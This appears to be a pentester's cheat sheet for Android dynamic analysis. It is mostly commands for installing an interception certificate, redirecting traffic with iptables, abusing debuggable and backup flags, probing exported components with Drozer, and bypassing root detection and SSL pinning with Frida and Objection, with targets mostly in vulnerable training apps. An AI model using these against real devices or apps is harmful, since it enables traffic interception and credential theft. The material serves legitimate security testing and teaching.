Mobile Testing 2
Dynamic Analysis
Traffic Interception
Add Proxy Certificate
# Convert DER to PEM
openssl x509 -inform DER -in cert -out cacert.pem
NUM=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1)
mv cacert.pem $NUM.0
# Insert Burp Cert
adb devices
adb push 9a5ba575.0 /sdcard/
adb shell "su -c 'mount -o rw,remount /system'"
adb shell "su -c 'mv /sdcard/9a5ba575.0 /system/etc/security/cacerts/'"
adb shell "su -c 'chmod 644 /system/etc/security/cacerts/9a5ba575.0'"
adb shell "su -c 'ls -l /system/etc/security/cacerts/9a5ba575.0'"
adb shell "su -c 'reboot'"Forward Traffic
adb shell "su -c 'iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination 192.168.222.70:8080'"
adb shell "su -c 'iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination 192.168.222.70:8080'"
adb shell "su -c 'iptables -t nat -A OUTPUT -p tcp --dport 8080 -j DNAT --to-destination 192.168.222.70:8080'"
adb shell "su -c 'iptables -t nat -A OUTPUT -p tcp --dport 7000 -j DNAT --to-destination 192.168.222.70:8080'"
adb shell "su -c 'iptables -t nat -A OUTPUT -p tcp --dport 7001 -j DNAT --to-destination 192.168.222.70:8080'"
adb shell "su -c 'iptables -t nat -A OUTPUT -p tcp --dport 7003 -j DNAT --to-destination 192.168.222.70:8080'"
adb shell "su -c 'iptables -t nat -A OUTPUT -p tcp --dport 7777 -j DNAT --to-destination 192.168.222.70:8080'"
adb shell "su -c 'iptables -t nat -L'"Essential Tools
# ADB
adb devices
adb -s ce0617160cdf473601 shell
adb connect 192.168.1.10:5555
adb -s 192.168.1.10:5555 shell
adb push note.txt /sdcard/
adb pull /sdcard/note.txt
adb install appname.apk
adb uninstall package_name
adb shell ps | grep -i appname
adb shell logcat | grep -i 19586
adb shell logcat | grep -i "http\|https\|cookie\|login\|md5\|sha1\|auth\|pass"
adb forward tcp:<host port> tcp:<device port>
# Package Manager
adb shell pm list packages
adb shell pm list packages -f google
adb shell pm list packages -3 | sort
adb shell pm path jakhar.aseem.diva
adb pull /data/app/jakhar.aseem.diva-1/base.apk
# Activity Manager
am start -n package_name/.activity_name
am start -a jakhar.aseem.diva.action.VIEW_CREDS
am start -a jakhar.aseem.diva.action.VIEW_CREDS2 --ez "check_pin" false
am broadcast -n com.android.insecurebankv2/.MyBroadCastReceiver -a theBroadcast --es phonenumber 4444 --es newpass 123456
content query --uri content://jakhar.aseem.diva.provider.notesprovider/notes
# SQlite
qlite3 database_name
.tables
select * from table_name;
# Run-As
run-as jakhar.aseem.diva
run-as jakhar.aseem.diva whoamiDebug & Backup Flags
# If debug="true"
# Drozer specific apk
run app.package.attacksurface com.mwr.dz
# Drozer all applications
run app.package.debuggable
# JDB
adb shell ps | grep package_name
adb forward tcp:7777 jdwp:process_id // process_id = 13907
jdb -attach localhost:7777
> classes
> methods com.android.insecurebankv2.LoginActivity
> stop in com.android.insecurebankv2.LoginActivity.createUser()
> step
> locals
> set text = "Hacked!!!"
> run
# JDB One Liner
echo "classes" | jdb -attach localhost:7777 | grep package_name
echo "methods com.android.insecurebankv2.LoginActivity" | jdb -attach localhost:7777 | grep package_name
# If backup="true"
# Extract
adb backup com.android.insecurebankv2
# https://sourceforge.net/projects/adbextractor/
# Convert to tar using abe
java -jar abe.jar unpack backup.ab backup.tar password
tar xvf backup.tar
# Convert to tar using dd and python
dd if=backup.ab bs=1 skip=24 | python -c "import zlib,sys;sys.stdout.write(zlib.decompress(sys.stdin.read()))" > backup.tarDrozer
# Install drozer application in linux and drozer-agent in android.
wget https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer_2.4.4.deb
dpkg -i drozer_2.4.4.deb
adb forward tcp:31415 tcp:31415
drozer console connect
# Drozer apk
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
# List all the installed packages
run app.package.list
# Find the package name of a specific app
run app.package.list –f (string to be searched)
# See basic information
run app.package.info –a (package name)
# Identify the exported application components
run app.package.attacksurface (package name)
# Identify the list of exported Activities
run app.activity.info -a (package name)
# Launch the exported Activities
run app.activity.start --component (package name) (component name)
# Identify the list of exported Services
run app.service.info -a (package name)
# Identify the list of exported Broadcast receivers
run app.broadcast.info -a (package name)
# Send a message to a Broadcast receiver
run app.broadcast.send --action (broadcast intent filter) --extra string phonenumber 4444 --extra string newpass 123456
# Content providers
run app.provider.info -a jakhar.aseem.diva
run scanner.provider.finduris -a jakhar.aseem.diva
run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes/
# Detect SQL injections in content providers
run scanner.provider.injection -a (package name)
# Detect Directory Traversal in content providers
run scanner.provider.traversal -a com.mwr.example.sieve
# Sniff Broadcast
run app.broadcast.sniff --action "theBroadcast"Frida
# Frida Server
/data/local/tmp/frida-server-14.0.8-android-x86_64 &
# Root Bypass JS
frida -U -f package_name -l root_bypass.js --no-pause
# SSLCert Pinning Bypass JS
frida -U -f package_name -l frida-android-repinning_sa.js --no-pauseObjection
# Objection
env
pwd
ls
file cat SharedPreferences.xml
!whoami // run any system command
android hooking list activities
android hooking search classes (keyword)
android hooking list class_methods com.android.insecurebankv2.LoginActivity
android hooking watch class_method com.android.insecurebankv2.LoginActivity.doesSUexist --dump-return
android hooking set return_value com.android.insecurebankv2.PostLogin.doesSUexist false
android intent launch_activiry com.android.insecurebankv2.PostLogin
memory dump all result.dump
strings result.dump | grep -i "password"
android sslpinning disable
android root disable
android root simulLast updated